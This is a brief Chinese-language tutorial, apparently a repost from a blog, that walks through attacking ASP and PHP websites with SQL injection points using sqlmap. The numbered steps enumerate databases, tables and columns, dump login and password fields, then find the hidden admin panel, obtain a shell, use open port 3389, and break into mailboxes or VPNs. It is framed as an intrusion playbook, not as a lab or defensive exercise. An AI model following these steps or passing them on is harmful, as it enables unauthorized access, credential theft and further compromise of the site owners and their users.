sqlmap攻击ASP、PHP有注入点的网站

找到注入点

1、设置sqlmap -u 地址 --dbs --current-user，

2、设置sqlmap -u 地址 --tables猜解表名,或者--dbms mysql --tables

3、设置sqlmap -u 地址 -T uname(表名) --columns猜解列名

4、设置sqlmap -u 地址 -T uname(表名) -C login-name,pass,username(列名，用逗号分隔) --dump获取数据

5、获取登录账号和密码后，找到管理登录口，一般比较隐蔽，可以通过工具、联系我们角落、源文件等等获取

6、进入后台以后，再争取拿shell，3389端口打开，进入邮箱或VPN等等

原文：http://luzhiping.blog.51cto.com/9334832/1696165